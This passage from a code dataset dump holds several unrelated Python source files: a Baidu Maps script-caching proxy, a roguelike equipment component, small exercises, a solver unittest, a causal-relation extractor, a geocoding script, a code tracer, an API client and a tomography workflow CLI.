url\n else :\n _rsync_webgl_js = getscriot_new(url)\n _webgl_js_tmp = await _rsync_webgl_js\n _webgl_js = _webgl_js_tmp.replace(\"https://\", \"http://\")\n _functon_webgl_new = srt.replace(\n url, \"%s/v2lbsyun/getscript/%s\" % (EXTERNAL_URL, ak)\n )\n if \".css\" in url.lower():\n if \".baidu.com\" in _webgl_.lower() :\n _webgl_css = url\n else :\n _rsync_webgl_css = getscriot_new(url)\n _webgl_css_tmp = await _rsync_webgl_css\n _webgl_css = _webgl_css_tmp.replace(\"https://\", \"http://\")\n \n _functon_webgl_new = _functon_webgl_new.replace(\n url, \"%s/v2lbsyun/getbmapcss/%s\" % (EXTERNAL_URL, ak)\n )\n # ## 拼接后的 function 放到redis\n MyredisClient.pull_redis_data(_key_new, _functon_webgl_new)\n\n # ## js key\n _getscript_key = (\"%s%s\") % (Configs._GETSCRIPT_KEY, ak)\n _getscript_new_key = (\"%s%s\") % (Configs._GETSCRIPT_NEW_KEY, ak)\n # ## css key\n _getbmapcss_key = (\"%s%s\") % (Configs._GETBMAPCSS_KEY, ak)\n _getbmapcss_new_key = (\"%s%s\") % (Configs._GETBMAPCSS_NEW_KEY, ak)\n\n _uuid = UtilsTools().getUuid1()\n # ## 获取源js\n _rsync_getscript = send_http(_uuid, _webgl_js, _headers={})\n _getscript = await _rsync_getscript\n if \"Internal#Server#Error\" in _getscript:\n logger.error((\"[%s] {%s}\" % (\"ER99999:请求互联网失败!\", _webgl_js)))\n else:\n logger.info(_getscript)\n # ## 获取源js 入库\n MyredisClient.pull_redis_data(_getscript_key, _getscript)\n # ## 替换后的 js\n _rsync_getscript_tmp = getscriot_new(_getscript)\n _getscript_tmp = await _rsync_getscript_tmp\n MyredisClient.pull_redis_data(_getscript_new_key, _getscript_tmp)\n # ## 获取源css 入库\n _rsync_getbmapcss = send_http(_uuid, _webgl_css, _headers={})\n _getbmapcss = await _rsync_getbmapcss\n if \"Internal#Server#Error\" in _getscript:\n logger.error((\"[%s] {%s}\" % (\"ER99999:请求互联网失败!\", _webgl_css)))\n else:\n logger.debug(_getbmapcss)\n # ## 获取源css 入库\n MyredisClient.pull_redis_data(_getbmapcss_key, _getbmapcss)\n # ## 替换后的 css\n\n _rsync_getbmapcss_tmp = getscriot_new(_getbmapcss)\n _getbmapcss_tmp = await _rsync_getbmapcss_tmp\n MyredisClient.pull_redis_data(_getbmapcss_new_key, _getbmapcss_tmp)\n return _functon_webgl_new\n\n\n# 替换js css\nasync def getscriot_new(srt):\n # ## 替换域名\n tmp_srt = (\n srt.replace(MAPOPEN_CDN_BCEBOS_COM, NG_MAPOPEN_CDN_BCEBOS_COM, -1)\n .replace(HM_BAIDU_COM, NG_HM_BAIDU_COM, -1)\n .replace(API_MAP_BAIDU_COM, NG_API_MAP_BAIDU_COM, -1)\n .replace(MAPONLINE0_BDIMG_COM, NG_MAPONLINE0_BDIMG_COM, -1)\n .replace(MAPONLINE1_BDIMG_COM, NG_MAPONLINE1_BDIMG_COM, -1)\n .replace(MAPONLINE2_BDIMG_COM, NG_MAPONLINE2_BDIMG_COM, -1)\n .replace(MAPONLINE3_BDIMG_COM, NG_MAPONLINE3_BDIMG_COM, -1)\n .replace(WEBMAP0_BDIMG_COM, NG_WEBMAP0_BDIMG_COM, -1)\n .replace(PCOR_BAIDU_COM, NG_PCOR_BAIDU_COM, -1)\n .replace(MIAO_BAIDU_COM, NG_MIAO_BAIDU_COM, -1)\n .replace(DLSWBR_BAIDU_COM, NG_DLSWBR_BAIDU_COM, -1)\n .replace(MAP_BAIDU_COM, NG_MAP_BAIDU_COM, -1)\n )\n logger.info(tmp_srt)\n return tmp_srt\n# 处理函数示例\n@app.get(\"/v1/ping\", tags=[\"ping\"])\nasync def ping_controllers(request: Request):\n # 查询redis数据\n return {\"message\": request.url, \"nu\": MyredisClient.dbsize_redis()}\n\n\n# ####################################################################################################\n\n# jsapi getscript getbmapcss os.environ.get('xx', '127.0.0.1')\n\n# https://api.map.baidu.com/api?v=1.0&type=webgl&ak=\n\n\n@app.get(\"/v2lbsyun/webgl/{ak}\", tags=[\"jsapi\"])\nasync def jsapi_controllers(ak, response: Response, request: Request):\n _uuid = UtilsTools().getUuid1()\n logger.debug((\"[%s] {%s}\" % (_uuid, ak)))\n # # ## 查询redis key 是否存在如果存在直接从 redis 中获取\n _key = (\"%s%s\") % (Configs._JSAPI_KEY, ak)\n _key_new = (\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak)\n _redis_data = MyredisClient.get_redis_data(_key_new)\n\n if _redis_data is not None and _redis_data != \"\" and len(_redis_data) > 0:\n return Response(content=_redis_data, media_type=\"text/plain\")\n else:\n # ## 清理key ##\n clear_redis_key(ak)\n logger.info((\"[%s] {%s}\" % (_uuid, \"clear_redis_key\")))\n # ## 通过接口获取方法\n _requrl = (\"%s%s\") % (_webgl_, ak)\n logger.debug((\"[%s] {%s}\" % (_uuid, _requrl)))\n logger.info(\"[%s][%s][%s] \" % (_uuid, request.client.host, request.url))\n # ## 源方法\n _rsync_functon_webgl = send_http(_uuid, _requrl, _headers={})\n _functon_webgl = await _rsync_functon_webgl\n \n # ## 接口是否异常异常直接返回给前端\n if \"Internal#Server#Error\" in _functon_webgl:\n return _functon_webgl\n else:\n MyredisClient.pull_redis_data(_key, _functon_webgl)\n if (\n _functon_webgl is not None\n and _functon_webgl != \"\"\n and len(_functon_webgl) > 0\n ):\n _rsync_function_url=function_url(ak, _functon_webgl)\n _functon_webgl_new = await _rsync_function_url\n\n return Response(content=_functon_webgl_new, media_type=\"text/plain\")\n else:\n return {\"message\": \"ER88888:处理数据异常非标准数据!\", \"url\": _requrl}\n\n\n@app.get(\"/v2lbsyun/getscript/{ak}\", tags=[\"getscript\"])\nasync def getscript_controllers(ak, response: Response, request: Request):\n # 直接返回\n _key = (\"%s%s\") % (Configs._GETSCRIPT_NEW_KEY, ak)\n _redis_data = MyredisClient.get_redis_data(_key)\n if _redis_data is not None:\n return Response(content=_redis_data, media_type=\"text/plain\")\n else:\n _key = (\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak)\n MyredisClient.delete_redis_data(_key)\n return {\"message\": (\"%s%s\") % (_webgl_, ak)}\n\n\n@app.get(\"/v2lbsyun/getbmapcss/{ak}\", tags=[\"getbmapcss\"])\nasync def getbmapcss_controllers(ak, response: Response, request: Request):\n # 如果有直接返回\n _key = (\"%s%s\") % (Configs._GETBMAPCSS_NEW_KEY, ak)\n _redis_data = MyredisClient.get_redis_data(_key)\n if _redis_data is not None:\n return Response(content=_redis_data, media_type=\"text/plain\")\n else:\n _key = (\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak)\n MyredisClient.delete_redis_data(_key)\n return {\"message\": (\"%s%s\") % (_webgl_, ak)}\n\n\n# 处理函数示例\n@app.get(\"/v2lbsyun/clear/{ak}\", tags=[\"clear\"])\nasync def clear_controllers(ak, sk, response: Response, request: Request):\n _uuid = UtilsTools().getUuid1()\n logger.info(\"[%s][%s][%s] \" % (_uuid, request.client.host, request.url))\n # 计算 32 小写\n hash_object2 = hashlib.md5(\n hashlib.md5(ak.encode()).hexdigest().encode()\n ).hexdigest()\n if sk in hash_object2:\n clear_redis_key(ak)\n logger.info(\"[%s][%s][%s]\" % (request.url, _uuid, request.client.host))\n return {\"message\": request.url}\n else:\n logger.info(\"[%s][%s][%s]\" % (request.url, _uuid, request.client.host))\n return {\"message\": \"认证失败!\"}\n","repo_name":"yanxianhe/v2lbsyun","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19519878687","text":"\"\"\"A component of entity. Holds the entities that are currently equipped.\"\"\"\n\nfrom equipment_slots import EquipmentSlots\n\nclass Equipment:\n def __init__(self, main_hand=None, off_hand=None):\n self.main_hand = main_hand\n self.off_hand = off_hand\n\n @property\n def max_hp_bonus(self):\n bonus = 0\n\n if self.main_hand and self.main_hand.equippable:\n bonus += self.main_hand.equippable.max_hp_bonus\n\n if self.off_hand and self._off_hand_equippable:\n bonus += self.off_hand.equippable.max_hp_bonus\n\n return bonus\n\n @property\n def power_bonus(self):\n bonus = 0\n\n if self.main_hand and self.main_hand.equippable:\n bonus += self.main_hand.equippable.power_bonus\n\n if self.off_hand and self.off_hand.equippable:\n bonus += self.off_hand.equippable.power_bonus \n\n return bonus\n\n @property\n def defense_bonus(self):\n bonus = 0\n\n if self.main_hand and self.main_hand.equippable:\n bonus += self.main_hand.equippable.defense_bonus\n\n if self.off_hand and self.off_hand.equippable:\n bonus += self.off_hand.equippable.defense_bonus\n\n return bonus\n\n def toggle_equip(self, equippable_entity):\n results = []\n\n slot = equippable_entity.equippable.slot\n\n if slot == EquipmentSlots.MAIN_HAND:\n if self.main_hand == equippable_entity: # If the item is aleady in the main hand dequip it.\n self.main_hand = None\n results.append({\"dequipped\": equippable_entity})\n else:\n if self.main_hand: # If a different item is in the main hand dequip it.\n results.append({\"dequipped\": self.main_hand})\n\n self.main_hand = equippable_entity\n results.append({\"equipped\": equippable_entity})\n elif slot == EquipmentSlots.OFF_HAND:\n if self.off_hand == equippable_entity:\n self.off_hand = None\n results.append({\"dequipped\": equippable_entity})\n else:\n if self.off_hand:\n results.append({\"dequipped\": self.off_hand})\n\n self.off_hand = equippable_entity\n results.append({\"equipped\": equippable_entity})\n\n return results","repo_name":"dbane744/rougelike","sub_path":"components/equipment.py","file_name":"equipment.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36832772490","text":"# Write a function that will remove all vowels from a given string. \n# The function should return a string.\n# Example:\n# Input: 'Joel'\n# Output: 'Jl'\n\n# create a function\n# define vowels\n# have the function check the list of vowels and match against the string\n# only add letters back in to the string that don't match the vowels\n\ndef shortcut( s ):\n\n vowels = [\"a\",\"e\",\"i\",\"o\",\"u\"]\n answer = \"\"\n for letter in s:\n if letter.lower() not in vowels:\n answer += letter\n return answer\n\nprint(shortcut(\"JOel\"))","repo_name":"TheSincoder/whiteboard","sub_path":"remove_vowels.py","file_name":"remove_vowels.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14527478099","text":"import scipy.sparse as spa\nimport numpy as np\nimport mathprogbasepy as mpbpy\n\n\n# Unit Test\nimport unittest\nimport numpy.testing as nptest\n\n\nclass basic_miqp(unittest.TestCase):\n\n def setUp(self):\n # Reset random seed for repeatability\n np.random.seed(1)\n\n # Random Example\n n = 30\n m = 50\n p = 5 # Number of integer variables\n\n # Generate random Matrices\n Pt = spa.random(n, n, density=0.6)\n P = Pt.dot(Pt.T).tocsc()\n q = np.random.randn(n)\n A = spa.random(m, n, density=0.6).tocsc()\n u = 3 + np.random.randn(m)\n l = -3 + np.random.randn(m)\n\n # Generate random vector of indeces\n i_idx = np.random.choice(np.arange(0, n), p, replace=False)\n\n # Generate variable bounds \n i_l = -1*np.ones(p)\n i_u = 1*np.ones(p)\n\n self.p = mpbpy.QuadprogProblem(P, q, A, l, u, i_idx, i_l, i_u)\n\n def test_basic_MIQP(self):\n # Solve with GUROBI\n res_gurobi = self.p.solve(solver=mpbpy.GUROBI)\n\n # Solve with CPLEX\n res_cplex = self.p.solve(solver=mpbpy.CPLEX)\n\n # Solve with MOSEK\n res_mosek = self.p.solve(solver=mpbpy.MOSEK)\n\n # Assert solutions matching (GUROBI - CPLEX)\n nptest.assert_allclose(res_gurobi.obj_val,\n res_cplex.obj_val,\n rtol=1e-4, atol=1e-4)\n nptest.assert_allclose(res_gurobi.x,\n res_cplex.x,\n rtol=1e-4, atol=1e-4)\n\n # Assert solutions matching (GUROBI - MOSEK)\n nptest.assert_allclose(res_gurobi.obj_val,\n res_mosek.obj_val,\n rtol=1e-4, atol=1e-4)\n nptest.assert_allclose(res_gurobi.x,\n res_mosek.x,\n rtol=1e-4, atol=1e-4)\n","repo_name":"bstellato/mathprogbasepy","sub_path":"mathprogbasepy/unittests/basic_miqp.py","file_name":"basic_miqp.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39575192426","text":"\nverb_tags=[\"VB\", \"VBP\", \"VBD\", \"VBZ\", \"VBN\", \"VBG\"]\n\nclass CausalLinks:\n\n def __init__(self, events, event_local_index, events2, entities, entity_local_index, sentence, lemmas, pos,\n event_scores, entity_scores):\n self.sentence= sentence\n self.tokens= self.sentence.split(' ')\n self.events = events\n self.events2 = {}\n #Fix that? Delete events[e] where e is in events2?\n for span in events2:\n event = events[span]\n del self.events[span]\n self.events2[span] = event\n self.triggers= self.detect_causal_triggers(lemmas, pos)\n self.bounds= self.set_bounds()\n self.event_index= event_local_index\n self.entities= entities\n self.entity_index= entity_local_index\n self.report_frames = ['Communication', 'Text_creation', 'Statement', 'Warning', 'Indicating', 'Cogitation']\n self.event_scores= event_scores\n self.entity_scores= entity_scores\n\n\n def format(self, keys):\n event_index=\"\"\n event_text=\"\"\n bestScore = -1.0\n for span in self.event_index.keys():\n if span in keys:\n index= self.event_index[span]\n if self.event_scores[index] > bestScore:\n bestScore = self.event_scores[index]\n event_index = index\n event_text = self.events[span]['trigger']\n return event_index, event_text\n\n def detect_causal_triggers(self, lemmas, pos):\n triggers=[]\n if len(self.events)<2:\n return []\n # Hard Triggers\n causal={'CauseEffect':['impact', 'affect', 'drive', 'lead', 'result', 'cause', 'so', 'hence', 'consequence'],\n 'EffectCause':['because', 'due', 'since', 'as']}\n ##Add constraint that preventive triggers must also be verbs???\n # What about correlation triggers?\n ## Soft triggers\n preventive = ['prevent', 'limit', 'restrict', 'constrain', 'block', 'bind', 'regulate']\n quantitative_triggers = ['increase', 'decrease', 'reduce', 'boost', 'drop']\n # Hard or soft?\n correlation = ['relate', 'influence', 'correlate']\n for index in range(len(lemmas)):\n lemma= lemmas[index]\n if lemma in causal['CauseEffect']:\n if 'by' in lemmas[index+1:]:\n triggers.append((index, \"right\", 'CausalRelation'))\n else:\n triggers.append((index, \"left\", 'CausalRelation'))\n elif lemma in causal['EffectCause']:\n triggers.append((index, 'right', 'CausalRelation'))\n elif lemma in preventive:\n if pos[index] in verb_tags:\n if 'by' in lemmas[index + 1:]:\n triggers.append((index, \"right\", 'PreventRelation'))\n else:\n triggers.append((index, \"left\", 'PreventRelation'))\n elif lemma in correlation:\n triggers.append((index, \"left\", 'CorrelateRelation'))\n elif lemma in quantitative_triggers:\n triggers.append((index, \"left\", 'Increase/Decrease'))\n for span in self.events2:\n index=self.events2[span]['index']\n triggers.append((index, \"left\", \"Catalyst/Mitigator/Precondition\"))\n return triggers\n\n def set_bounds(self):\n bounds={}\n bound_index = [-1, len(self.tokens)] ###Changed that\n for trigger in self.triggers:\n index= trigger[0]\n bound_index.append(index)\n bounds[index]= {\"trigger\": trigger}\n bound_index.sort()\n for i in range(1, len(bound_index)-1):\n bound= bound_index[i]\n prev= bound_index[i-1]\n next= bound_index[i+1]\n bounds[bound].update({'curr': bound, \"prev\": prev, \"next\": next})\n return bounds\n\n def get_causal_nodes(self, entity_replacement=False):\n ##Use also Entities as potential nodes, in case that we cannot locate an Event as cause/effect\n causal_links=[]\n for b in self.bounds.keys():\n bound= self.bounds[b]\n trigger, direction, causal_type= bound['trigger']\n cause, effect= self.locate_events(bound, direction) ##Left is default: cause, relation, effect\n cause_index, cause_text = self.format(cause)\n effect_index, effect_text= self.format(effect)\n if entity_replacement:\n if len(effect_index)== 0:\n cause, effect = self.locate_events(bound, direction)\n effect_index, effect_text = self.format(effect)\n elif len(cause_index)==0:\n cause, effect = self.locate_events(bound, direction)\n cause_index, cause_text = self.format(cause)\n if cause_index!= '' and effect_index!= '':\n trigger_text= self.tokens[trigger]\n causal_links.append({'trigger': trigger_text, 'cause': (cause_index, cause_text),\n 'effect': (effect_index, effect_text), 'type': causal_type})\n return causal_links\n\n def locate_events(self, bound, direction):\n keys = self.events.keys()\n left_events=[]\n right_events=[]\n for span in keys:\n event = self.events[span]\n #index = self.sentence.index(event['trigger'])\n event_text= event['trigger'].split(' ')[0]\n index= self.tokens.index(event_text)\n if len(set(event['frame_FN']).intersection(set(self.report_frames))) >0:\n continue\n if index>bound['prev'] and indexbound['curr']:\n right_events.append(span)\n if direction=='left':\n return left_events, right_events\n return right_events, left_events","repo_name":"spilioeve/WM-src","sub_path":"sofia/causal_extraction.py","file_name":"causal_extraction.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"69916588965","text":"\r\n\"\"\"\r\nTask 1\r\n\r\nПример входного файла:\r\n ab\r\n c\r\n dde\r\n ff\r\n\"\"\"\r\n\r\n\r\ndef task_1():\r\n lines = []\r\n file = open('input_f.txt', 'r')\r\n file2 = open('res_f.txt', 'w')\r\n\r\n for line in file:\r\n lines.append(line.replace('\\n', ''))\r\n print(lines)\r\n\r\n for line in reversed(lines):\r\n file2.write(line)\r\n file2.write('\\n')\r\n file.close()\r\n file2.close()\r\n\r\n\r\n# Find files in directories\r\ndef task_2():\r\n import os\r\n res_file = open('res_f.txt', 'w')\r\n folder = input(\"Input name folder for work: \")\r\n catch_py = 0\r\n for current_dir, dirs, files in os.walk(folder):\r\n for file in files:\r\n if (file.rfind('y') == len(file) - 1) and catch_py != 1:\r\n catch_py = 1\r\n res_file.write(current_dir)\r\n res_file.write('\\n')\r\n catch_py = 0\r\n res_file.close()\r\n\r\n\r\n# Task 3 LAMBDA\r\ndef mod_checker(x, mod=0):\r\n return lambda y: y % x == mod\r\n\r\n# task_1()\r\n# task_2()","repo_name":"eiire/PythonStudy","sub_path":"Basics_and_application/standard_python_capabilities/2.4_files.py","file_name":"2.4_files.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4066006232","text":"import pandas as pd\nimport googlemaps\nfrom tqdm import tqdm\n\ntqdm.pandas()\nkey =\"\"\n\n\ngmaps_key = googlemaps.Client(key=key)\n\ndef geocode(add):\n g = gmaps_key.geocode(add)\n lat = g[0][\"geometry\"][\"location\"][\"lat\"]\n lng = g[0][\"geometry\"][\"location\"][\"lng\"]\n return (lat,lng)\n \ndef full_address(add, city):\n return add + \", \" + city + \", PA\"\n\ndef main():\n data = pd.read_csv('sideyard473.csv',encoding=\"ISO-8859-1\")\n df = data.copy()\n \n df['property_address'] = df['Property_Address']\n df = df.drop(['Property_Address'], axis=1)\n \n \n df['full_address'] = df.progress_apply(lambda x: full_address(x['property_address'], x['City']), axis=1)\n df = df.drop(['City'], axis=1)\n\n df['coords'] = df['full_address'].apply(geocode)\n\n df.to_csv(\"sideyards_coords.csv\")\n \nmain()","repo_name":"ncote3/phl-bank-lien-parcel-analysis","sub_path":"parcel_coords.py","file_name":"parcel_coords.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41551358069","text":"import datetime\nimport sys\nimport uuid\nfrom pathlib import Path\nfrom typing import List\n\nfrom pycrunch_trace.client.command_buffer import ArrayCommandBuffer\nfrom pycrunch_trace.client.networking import event_queue\nfrom pycrunch_trace.filters import CustomFileFilter\nfrom pycrunch_trace.oop import File, Clock, SafeFilename\nfrom pycrunch_trace.tracing.inline_profiler import inline_profiler_instance\n\nimport pyximport\npyximport.install()\nfrom pycrunch_trace.native.native_tracer import NativeTracer\n\nfrom pycrunch_trace.tracing.simple_tracer import SimpleTracer\n\n\nclass Trace:\n clock: Clock\n _tracer: SimpleTracer\n\n def __init__(self):\n self.default_host = 'http://0.0.0.0:8080'\n self.command_buffer = ArrayCommandBuffer()\n self.is_tracing = False\n self.session_name = None\n self._tracer = None\n # self._client: network_client.TracingClient = None\n self.clock = None\n self.host = None\n self.outgoingQueue = None\n\n def generate_session_name(self) -> str:\n iso_time = datetime.datetime.now().replace(microsecond=0).isoformat()\n return f'{iso_time}_{str(uuid.uuid4())[:5]}'\n\n def start(self, session_name: str = None, host: str = None, profile_name: str = None, additional_excludes: List[str] = None):\n\n if self.is_tracing:\n raise Exception('PyCrunch tracer ERROR: tracing already started')\n\n self.prepare_state(host, session_name)\n self.warn_if_another_tracing_set()\n\n if not profile_name:\n profile_name = 'default.profile.yaml'\n package_directory = Path(__file__).parent.parent.parent\n file_filter = CustomFileFilter(File(package_directory.joinpath('pycrunch-profiles', profile_name)))\n file_filter._ensure_loaded()\n\n if additional_excludes is not None:\n file_filter.add_additional_exclusions(additional_excludes)\n\n self.start_queue()\n\n self.clock = Clock()\n # todo maybe move command buffer to tracer?\n # self._tracer = SimpleTracer(self.command_buffer, self.session_name, f_filter, self.clock, self.outgoingQueue)\n # TODO windows test\n self._tracer = NativeTracer(self.session_name, self.outgoingQueue, file_filter)\n self.outgoingQueue.start()\n\n self.outgoingQueue.tracing_will_start(self.session_name)\n\n # also trace parent function\n sys._getframe().f_back.f_trace = self._tracer.simple_tracer\n\n sys.settrace(self._tracer.simple_tracer)\n\n self.is_tracing = True\n\n def start_queue(self):\n self.outgoingQueue = event_queue\n self.outgoingQueue.start()\n\n def warn_if_another_tracing_set(self):\n if sys.gettrace():\n # there is already trace\n print('PyCrunch tracer WARNING:')\n print(' -- there is already trace function set. ')\n print(' -- continuing might result in errors ')\n\n def prepare_state(self, host, session_name):\n if not session_name:\n self.session_name = SafeFilename(self.generate_session_name()).__str__()\n else:\n self.session_name = SafeFilename(session_name).__str__()\n if host:\n self.host = host\n else:\n self.host = self.default_host\n\n def stop(self):\n sys.settrace(None)\n\n inline_profiler_instance.print_timings()\n # import pydevd_pycharm\n # pydevd_pycharm.settrace('localhost', port=44441, stdoutToServer=True, stderrToServer=True)\n print('tracing complete, saving results')\n self.is_tracing = False\n # snapshot.save('a', self.command_buffer)\n local = False\n # local = True\n if local:\n self._tracer.session.buffer_became_available(self.command_buffer)\n self._tracer.session.save()\n\n self._tracer.flush_outstanding_events()\n self._tracer.finalize()\n\n # self._tracer.session.save()\n\n\n # self._client.push_message(self._tracer.session)\n # self._client.disconnect()\n","repo_name":"gleb-sevruk/pycrunch-trace","sub_path":"pycrunch_trace/client/api/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"52"} +{"seq_id":"11252349206","text":"import requests\n\nfrom justnimbus.exceptions import InvalidClientID, JustNimbusError\nfrom justnimbus.model import JustNimbusModel\n\n\nclass JustNimbusClient:\n def __init__(self, client_id: str, zip_code: str):\n self._client_id = client_id\n self._zip_code = zip_code\n\n def get_data(self) -> JustNimbusModel:\n url = f\"https://dashboard.justnimbus.com/user/view.php?system={self._client_id}&zip={self._zip_code}&output=json\"\n response = requests.get(url=url)\n\n try:\n response.raise_for_status()\n return JustNimbusModel.from_dict(response.json()[0])\n except requests.HTTPError as error:\n if response.status_code == 404:\n raise InvalidClientID(client_id=self._client_id) from error\n raise JustNimbusError() from error\n except LookupError as error:\n raise JustNimbusError() from error\n","repo_name":"kvanzuijlen/justnimbus","sub_path":"src/justnimbus/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29387635278","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport time\nplt.ion()\n\ndef Ax_2d(V,mask):\n #Compute A*x for some potential and mask\n Vuse=V.copy()\n Vuse[mask]=0\n ans=(Vuse[1:-1,:-2]+Vuse[1:-1,2:]+Vuse[2:,1:-1]+Vuse[:-2,1:-1])/4.0\n ans=ans-V[1:-1,1:-1]\n return ans\n\ndef relaxation_method(n,tol):\n #Get initial values for potential and set boundary conditions on the edges\n V=np.zeros([n,n])\n V_true=np.zeros([n,n])\n bc=0*V\n mask=np.zeros([n,n],dtype='bool')\n mask[:,0]=True\n mask[:,-1]=True\n mask[0,:]=True\n mask[-1,:]=True\n\n #Get the indices of a circle in the center of our space, set its potential to be fixed at 1\n r=n//8\n x=np.arange(0,n)\n y=np.arange(0,n)\n cx=len(x)//2\n cy=len(y)//2\n circle_indices=(x[np.newaxis,:]-cx)**2+(y[:,np.newaxis]-cy)**2 < r**2\n bc[circle_indices]=1\n mask[circle_indices]=True\n\n #Compute the true potential\n lamb=-1.0/(np.log((n//2)/r))\n A=1-lamb*np.log(r)\n V_true=lamb*np.log(np.sqrt((x[np.newaxis,:]-cx)**2+(y[:,np.newaxis]-cy)**2))+A\n V_true[mask]=bc[mask]\n\n V=bc.copy()\n\n #Set some initial values\n b=-(bc[1:-1,0:-2]+bc[1:-1,2:]+bc[:-2,1:-1]+bc[2:,1:-1])/4.0\n converged=False\n steps=0\n\n while(not converged):\n #While the residuals are too big, compute the potential and new residuals using the elaxation method\n V[1:-1,1:-1]=(V[1:-1,0:-2]+V[1:-1,2:]+V[:-2,1:-1]+V[2:,1:-1])/4.0\n V[mask]=bc[mask]\n steps+=1\n r=b-Ax_2d(V,mask)\n converged=np.sum(r*r) None:\n if args.template_file is not None:\n wf = Workflow.construct_from_file(args.template_file)\n wf.cli()\n else:\n wf = Workflow.construct_from_cli()\n wf.write_to_file(args.output_file, force_overwrite=args.force_overwrite)\n\nconstruct_parser = subparsers.add_parser('construct', help='''Construct a valid Tomo\n workflow representation on the command line and save it to a file. Optionally use\n an existing file as a template and/or preform the reconstruction or transfer to Galaxy.''')\nconstruct_parser.set_defaults(func=construct)\nconstruct_parser.add_argument('-t', '--template_file',\n type=pathlib.Path,\n required=False,\n help='''Full or relative template file path for the constructed workflow.''')\nconstruct_parser.add_argument('-f', '--force_overwrite',\n action='store_true',\n help='''Use this flag to overwrite the output file if it already exists.''')\nconstruct_parser.add_argument('-o', '--output_file',\n type=pathlib.Path,\n help='''Full or relative file path to which the constructed workflow will be written.''')\n\n\n# VALIDATE\ndef validate(args:list) -> bool:\n try:\n wf = Workflow.construct_from_file(args.input_file)\n logger.info(f'Success: {args.input_file} represents a valid Tomo workflow configuration.')\n return(True)\n except BaseException as e:\n logger.error(f'{e.__class__.__name__}: {str(e)}')\n logger.info(f'''Failure: {args.input_file} does not represent a valid Tomo workflow\n configuration.''')\n return(False)\n\nvalidate_parser = subparsers.add_parser('validate',\n help='''Validate a file as a representation of a Tomo workflow (this is most useful\n after a .yaml file has been manually edited).''')\nvalidate_parser.set_defaults(func=validate)\nvalidate_parser.add_argument('input_file',\n type=pathlib.Path,\n help='''Full or relative file path to validate as a Tomo workflow.''')\n\n\n# CONVERT\ndef convert(args:list) -> None:\n wf = Workflow.construct_from_file(args.input_file)\n wf.write_to_file(args.output_file, force_overwrite=args.force_overwrite)\n\nconvert_parser = subparsers.add_parser('convert', help='''Convert one Tomo workflow\n representation to another. File format of both input and output files will be\n automatically determined from the files' extensions.''')\nconvert_parser.set_defaults(func=convert)\nconvert_parser.add_argument('-f', '--force_overwrite',\n action='store_true',\n help='''Use this flag to overwrite the output file if it already exists.''')\nconvert_parser.add_argument('-i', '--input_file',\n type=pathlib.Path,\n required=True,\n help='''Full or relative input file path to be converted.''')\nconvert_parser.add_argument('-o', '--output_file',\n type=pathlib.Path,\n required=True,\n help='''Full or relative file path to which the converted input will be written.''')\n\n\n# DIFF / COMPARE\ndef diff(args:list) -> bool:\n raise ValueError('diff not tested')\n# wf1 = Workflow.construct_from_file(args.file1).dict_for_yaml()\n# wf2 = Workflow.construct_from_file(args.file2).dict_for_yaml()\n# diff = DeepDiff(wf1,wf2,\n# ignore_order_func=lambda level:'independent_dimensions' not in level.path(),\n# report_repetition=True,\n# ignore_string_type_changes=True,\n# ignore_numeric_type_changes=True)\n diff_report = diff.pretty()\n if len(diff_report) > 0:\n logger.info(f'The configurations in {args.file1} and {args.file2} are not identical.')\n print(diff_report)\n return(True)\n else:\n logger.info(f'The configurations in {args.file1} and {args.file2} are identical.')\n return(False)\n\ndiff_parser = subparsers.add_parser('diff', aliases=['compare'], help='''Print a comparison of \n two Tomo workflow representations stored in files. The files may have different formats.''')\ndiff_parser.set_defaults(func=diff)\ndiff_parser.add_argument('file1',\n type=pathlib.Path,\n help='''Full or relative path to the first file for comparison.''')\ndiff_parser.add_argument('file2',\n type=pathlib.Path,\n help='''Full or relative path to the second file for comparison.''')\n\n\n# LINK TO GALAXY\ndef link_to_galaxy(args:list) -> None:\n from .link_to_galaxy import link_to_galaxy\n link_to_galaxy(args.input_file, galaxy=args.galaxy, user=args.user,\n password=args.password, api_key=args.api_key)\n\nlink_parser = subparsers.add_parser('link_to_galaxy', help='''Construct a Galaxy history and link\n to an existing Tomo workflow representations in a NeXus file.''')\nlink_parser.set_defaults(func=link_to_galaxy)\nlink_parser.add_argument('-i', '--input_file',\n type=pathlib.Path,\n required=True,\n help='''Full or relative input file path to the existing Tomo workflow representations as \n a NeXus file.''')\nlink_parser.add_argument('-g', '--galaxy',\n required=True,\n help='Target Galaxy instance URL/IP address')\nlink_parser.add_argument('-u', '--user',\n default=None,\n help='Galaxy user email address')\nlink_parser.add_argument('-p', '--password',\n default=None,\n help='Password for the Galaxy user')\nlink_parser.add_argument('-a', '--api_key',\n default=None,\n help='Galaxy admin user API key (required if not defined in the tools list file)')\n\n\n# RUN THE RECONSTRUCTION\ndef run_tomo(args:list) -> None:\n from .run_tomo import run_tomo\n run_tomo(args.input_file, args.output_file, args.modes, center_file=args.center_file,\n num_core=args.num_core, output_folder=args.output_folder, save_figs=args.save_figs)\n\ntomo_parser = subparsers.add_parser('run_tomo', help='''Construct and add 